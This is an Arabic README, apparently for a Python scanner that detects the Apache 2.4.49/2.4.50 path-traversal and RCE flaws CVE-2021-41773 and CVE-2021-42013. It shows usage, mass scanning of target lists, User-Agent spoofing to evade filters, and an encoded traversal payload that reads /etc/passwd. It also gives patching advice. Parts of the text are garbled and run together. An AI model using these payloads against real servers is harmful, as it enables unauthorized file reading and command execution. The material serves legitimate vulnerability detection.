
ماسح مبني على Python لاكتشاف CVE-2021-41773 وCVE-2021-42013 ثغرات اجتياز المسار وتنفيذ الأوامر عن بُعد في Apache HTTP Server 2.4.49 و2.4.50.
ماسح ثغرات شامل مبني على Python لكشف ثغرتي CVE-2021-41773 وCVE-2021-42013 (اجتياز المسار وتنفيذ التعليمات البرمجية عن بُعد) في Apache HTTP Server بإصداريه 2.4.49 و2.4.50.
تُعد CVE-2021-41773 وCVE-2021-42013 ثغرتين حرجتين تؤثران على Apache HTTP Server وتسمحان للمهاجمين بـ:
حظيت هاتان الثغرتان باهتمام واسع في أكتوبر 2021، وتم استغلالهما بنشاط في البيئات الحقيقية.
.%2e) بتجاوز قيود الدليل/etc/passwd، وتنفيذ أوامر عشوائية إذا كان mod_cgi مفعّلاً%%32%65)✅ كشف مزدوج لثغرتي CVE: يختبر كلًا من CVE-2021-41773 وCVE-2021-42013 ✅ اختبار اجتياز المسار: أشكال متعددة من الحمولات لمحاولات الوصول إلى الملفات ✅ اختبار RCE: التحقق من تنفيذ التعليمات البرمجية عن بُعد إذا كان mod_cgi مفعّلاً ✅ الفحص الجماعي: فحص أهداف متعددة من ملف ✅ مخرجات ملوّنة: نتائج منسقة سهلة القراءة ✅ مهلة قابلة للتخصيص: مهلة طلب قابلة للتعديل للشبكات غير الموثوقة ✅ انتحال User-Agent: لتجاوز آليات التصفية الأساسية
requestscoloramahttps://github.com/drackyjr/CVE-2021-42013.git
cd cve-2021-41773-42013
pip3 install -r requirements.txt
أو التثبيت يدويًا:
pip3 install requests colorama
python3 cve_scanner.py -u http://192.168.1.100
python3 cve_scanner.py -u https://target.com
python3 cve_scanner.py -u http://target.com -t 15
python3 cve_scanner.py -l targets.txt
python3 cve_scanner.py -h
| الوسيط | الاختصار | النوع | الوصف |
|---|---|---|---|
--url | -u | STRING | عنوان URL للهدف (مثل: http://example.com) |
--list | -l | FILE | ملف يحتوي على قائمة الأهداف (هدف واحد في كل سطر) |
--timeout | -t | INTEGER | مهلة الطلب بالثواني (الافتراضي: 10) |
python3 cve_scanner.py -u http://192.168.1.100
أنشئ ملف targets.txt:
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
ثم نفّذ:
python3 cve_scanner.py -l targets.txt -t 15
python3 cve_scanner.py -u http://target.com -t 30
يوفر الماسح مخرجات تفصيلية تشمل:
مثال على المخرجات:
============================================================
CVE-2021-41773 / CVE-2021-42013 Vulnerability Scanner
============================================================
[*] Target: http://192.168.1.100
[*] Testing CVE-2021-41773 (Apache 2.4.49)...
[+] VULNERABLE to CVE-2021-41773!
[+] Payload: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
Scan Summary
============================================================
[!] Target is VULNERABLE!
[!] Immediate patching required!
[*] Recommendation: Upgrade to Apache HTTP Server 2.4.51 or later
============================================================
.%2e)/cgi-bin/ و/icons/ و/images//etc/passwd و/etc/shadow%%32%65)id للتحقق من تنفيذ التعليمات البرمجيةuid= وgid= في الاستجابةيبحث الماسح عن:
root: أو daemon: من /etc/passwduid= وgid= من تنفيذ أمر id<Directory />
Require all denied
</Directory>
# Restrict access to sensitive directories
<Directory /cgi-bin>
Require all denied
</Directory>
# Disable symbolic links if not needed
Options -FollowSymLinks
# Enable security headers
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
# Check Apache version
apache2 -v
httpd -v
| الإصدار | الحالة | الإجراء |
|---|---|---|
| 2.4.49 | ❌ ثغرة | قم بالترقية فورًا |
| 2.4.50 | ⚠️ مُصحَّح جزئيًا | قم بالترقية إلى 2.4.51+ |
| 2.4.51+ | ✅ مُصحَّح | لا إجراء مطلوب |
⚠️ هام: هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها والأغراض التعليمية. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قوانين مثل قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) والتشريعات المماثلة حول العالم.
للاستخدام المصرح به فقط:
تحذير إساءة الاستخدام: يتحمل المستخدمون مسؤولية ضمان حصولهم على إذن صريح قبل اختبار أي هدف. لا يتحمل المؤلفون أي مسؤولية عن الاستخدام غير المصرح به.
هذا الماسح مثالي لـ:
.
├── cve_scanner.py # Main scanner script
├── requirements.txt # Python dependencies
├── README.md # This file
├── targets.txt # Example target list
└── LICENSE # License information
requests==2.28.1
colorama==0.4.5
http://192.168.1.100
https://vulnerable.example.com
http://10.0.0.50:8080
الحل: قم بزيادة المهلة باستخدام الخيار -t
python3 cve_scanner.py -u http://target.com -t 30
الحل: يقوم البرنامج النصي بتعطيل التحقق من SSL افتراضيًا. إذا استمرت المشكلة، تأكد من تحديث شهادات Python:
pip3 install --upgrade certifi
الحل: تأكد من تثبيت جميع التبعيات
pip3 install -r requirements.txt
الحل: اجعل البرنامج النصي قابلاً للتنفيذ
chmod +x cve_scanner.py
python3 cve_scanner.py -u http://target.com
-l مع ملف أهداف لإجراء فحوصات متعددةالمساهمات مرحب بها! للمساهمة:
git checkout -b feature/improvement)git commit -m 'Add improvement')git push origin feature/improvement)يرجى التأكد من:
هذا المشروع مرخّص بموجب رخصة MIT. راجع ملف LICENSE للحصول على التفاصيل.
أداة اختبار أمني
أُنشئت للأغراض التعليمية واختبارات الأمان المصرح بها.
لأي أسئلة أو مشكلات أو اقتراحات، يرجى فتح issue على GitHub.
آخر تحديث: نوفمبر 2025
الحالة: تطوير نشط
تم الاختبار على: Python 3.8+ وApache 2.4.49 و2.4.50